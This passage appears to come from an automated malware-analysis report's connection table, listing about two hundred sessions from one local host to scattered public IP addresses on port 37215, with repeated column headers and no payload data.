                                                  10616192.168.2.136026284.17.167.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10617192.168.2.1348662193.106.28.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10618192.168.2.1352880197.199.101.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10619192.168.2.1344796197.207.127.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10620192.168.2.1354202201.231.195.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10621192.168.2.135269241.189.185.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10622192.168.2.133624224.45.41.8337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10623192.168.2.135375041.38.177.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10624192.168.2.1345968157.109.100.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10625192.168.2.134855441.159.15.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10626192.168.2.1339026197.222.94.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10627192.168.2.1346000197.130.162.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10628192.168.2.133891441.18.228.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10629192.168.2.1350008200.123.72.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10630192.168.2.1347932157.147.232.16037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10631192.168.2.135434441.138.153.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10632192.168.2.134600259.145.218.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10633192.168.2.136034041.140.104.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10634192.168.2.136076041.153.249.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10635192.168.2.1360398157.153.235.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10636192.168.2.1343500157.80.4.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10637192.168.2.1350212161.163.25.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10638192.168.2.134321041.103.135.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10639192.168.2.1338962197.236.203.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10640192.168.2.134669441.79.29.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10641192.168.2.1352798197.0.211.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10642192.168.2.1355780164.106.123.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10643192.168.2.1336694157.205.196.12637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10644192.168.2.1341770197.204.167.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10645192.168.2.1341134197.210.72.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10646192.168.2.133688041.170.125.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10647192.168.2.1339214157.159.214.21537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10648192.168.2.133815441.124.219.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10649192.168.2.135556841.53.172.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10650192.168.2.135723873.250.218.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10651192.168.2.1346954197.70.91.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10652192.168.2.1340994113.12.234.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10653192.168.2.1335836171.234.109.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10654192.168.2.1337790116.90.147.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10655192.168.2.133685841.219.186.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10656192.168.2.1348234217.132.66.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10657192.168.2.1350310157.135.199.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10658192.168.2.1348472197.238.80.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10659192.168.2.135868441.110.21.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10660192.168.2.1356232157.119.24.3037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10661192.168.2.1348610157.136.203.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10662192.168.2.1360802157.77.70.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10663192.168.2.1350586140.93.56.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10664192.168.2.133459441.61.219.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10665192.168.2.134244841.17.189.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10666192.168.2.1344856197.31.109.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10667192.168.2.1350806129.187.184.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10668192.168.2.133602441.14.78.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10669192.168.2.1350074157.173.243.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10670192.168.2.1344210157.251.198.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10671192.168.2.1332772197.45.33.16637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10672192.168.2.1344278157.32.11.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10673192.168.2.1338078221.86.164.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10674192.168.2.133437267.123.126.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10675192.168.2.134895464.149.232.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10676192.168.2.1357292157.36.114.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10677192.168.2.1338426109.76.121.18837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10678192.168.2.1354816157.122.196.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10679192.168.2.135691048.195.128.4337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10680192.168.2.1347782157.81.235.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10681192.168.2.1348536197.250.191.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10682192.168.2.133536241.248.44.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10683192.168.2.1339868197.219.179.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10684192.168.2.1336428157.122.217.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10685192.168.2.1354466102.164.192.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10686192.168.2.1347526197.189.189.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10687192.168.2.1342264197.173.70.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10688192.168.2.134896879.253.140.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10689192.168.2.1342288197.54.133.2437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10690192.168.2.134650641.230.248.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10691192.168.2.1345196197.1.243.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10692192.168.2.135433241.179.193.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10693192.168.2.133901841.107.191.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10694192.168.2.1359508177.204.97.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10695192.168.2.135490041.37.5.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10696192.168.2.1340134197.175.50.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10697192.168.2.1354312197.195.173.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10698192.168.2.1336794197.33.216.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10699192.168.2.135764041.183.7.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10700192.168.2.1337300197.252.169.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10701192.168.2.134954043.245.215.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10702192.168.2.1335728197.23.66.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10703192.168.2.1348364216.14.191.8737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10704192.168.2.1341292197.105.97.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10705192.168.2.134398223.25.131.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10706192.168.2.134762641.240.206.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10707192.168.2.1346426157.248.225.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10708192.168.2.135126241.242.139.17237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10709192.168.2.1360614157.66.145.337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10710192.168.2.1333344217.254.27.24737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10711192.168.2.1351136175.211.252.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10712192.168.2.1340442197.130.214.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10713192.168.2.1334606167.242.30.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10714192.168.2.1333404197.110.73.13837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10715192.168.2.1351896157.234.43.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10716192.168.2.135379641.115.185.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10717192.168.2.1358556197.165.230.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10718192.168.2.1334976157.100.234.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10719192.168.2.1357548197.73.235.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10720192.168.2.135130441.166.65.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10721192.168.2.135670041.154.17.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10722192.168.2.1358444197.235.227.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10723192.168.2.1350978157.204.241.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10724192.168.2.1360004157.12.120.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10725192.168.2.1358924157.239.164.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10726192.168.2.133598641.172.170.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10727192.168.2.1360118157.177.127.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10728192.168.2.134611241.100.93.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10729192.168.2.134314241.89.120.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10730192.168.2.133296641.10.234.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10731192.168.2.134281441.128.210.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10732192.168.2.1339106197.132.191.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10733192.168.2.134149641.252.227.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10734192.168.2.1353684197.189.122.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10735192.168.2.1353074197.232.23.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10736192.168.2.134635632.77.52.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10737192.168.2.1353652197.241.61.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10738192.168.2.1356690197.242.102.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10739192.168.2.135476499.223.54.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10740192.168.2.1351112197.223.215.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10741192.168.2.1351030130.222.245.20037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10742192.168.2.1353756197.41.63.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10743192.168.2.1355008197.214.224.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10744192.168.2.134539441.111.91.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10745192.168.2.135162441.160.79.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10746192.168.2.1350418201.245.52.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10747192.168.2.135211441.67.225.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10748192.168.2.1352258210.117.237.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10749192.168.2.1355788197.119.49.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10750192.168.2.1335252197.227.156.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10751192.168.2.1355864197.9.107.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10752192.168.2.133366841.210.28.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10753192.168.2.1351438197.153.78.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10754192.168.2.1348938157.97.221.13737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10755192.168.2.1351826157.46.34.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10756192.168.2.133536841.45.179.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10757192.168.2.135758441.233.164.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10758192.168.2.1358624130.186.249.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10759192.168.2.1341264197.17.190.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10760192.168.2.1343058157.212.56.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10761192.168.2.1342812197.171.115.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10762192.168.2.1353544157.171.171.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10763192.168.2.1338590197.124.89.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10764192.168.2.1336064157.46.106.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10765192.168.2.1334782220.119.42.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10766192.168.2.1351310157.97.92.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10767192.168.2.1351900197.155.217.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10768192.168.2.1342276216.107.204.13137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10769192.168.2.135941676.39.131.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10770192.168.2.1335264157.254.41.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10771192.168.2.135646841.0.202.22837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10772192.168.2.134784638.191.196.4537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10773192.168.2.1343070157.196.103.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10774192.168.2.1334944197.73.86.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10775192.168.2.134523241.162.173.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10776192.168.2.1357102197.246.123.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10777192.168.2.1347270157.179.119.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10778192.168.2.1352082178.154.0.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10779192.168.2.1341738157.41.137.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10780192.168.2.1352142110.147.221.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10781192.168.2.1358666157.63.67.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10782192.168.2.1360098197.129.102.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10783192.168.2.1338140157.166.157.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10784192.168.2.136017641.189.224.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10785192.168.2.1341220216.76.160.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10786192.168.2.133420066.121.226.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10787192.168.2.134595240.78.152.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10788192.168.2.1342364197.6.120.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10789192.168.2.135880641.173.174.11337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10790192.168.2.1347258134.234.85.7137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10791192.168.2.1356998197.164.120.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10792192.168.2.136095249.84.213.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10793192.168.2.1360184197.149.129.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10794192.168.2.1344928157.222.148.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10795192.168.2.1347324157.187.217.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10796192.168.2.1344930157.48.171.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10797192.168.2.136014837.124.253.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10798192.168.2.1346252157.229.189.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10799192.168.2.133669461.117.14.19737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10800192.168.2.1334874183.188.213.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10801192.168.2.133856441.218.56.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10802192.168.2.135737225.172.33.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10803192.168.2.135440841.124.61.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10804192.168.2.1348368116.57.251.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10805192.168.2.133614641.73.237.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10806192.168.2.1334246197.25.147.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10807192.168.2.1345822197.127.132.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10808192.168.2.1342236197.115.69.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10809192.168.2.134779041.168.81.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10810192.168.2.1334788197.66.129.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10811192.168.2.1346844197.173.49.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10812192.168.2.1338158197.182.226.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10813192.168.2.134050014.139.239.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10814192.168.2.135622641.130.159.10337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10815192.168.2.13480802.39.26.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10816192.168.2.1342208197.31.202.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10817192.168.2.1357666222.176.88.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10818192.168.2.1341362145.124.2.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10819192.168.2.1357636157.92.92.4637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10820192.168.2.1333866193.137.237.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10821192.168.2.1352688157.93.126.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10822192.168.2.1337706197.161.103.10237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10823192.168.2.133755449.82.162.17037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10824192.168.2.1348478197.39.162.23837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  10825192.168.2.1334488197.245.239.8137215
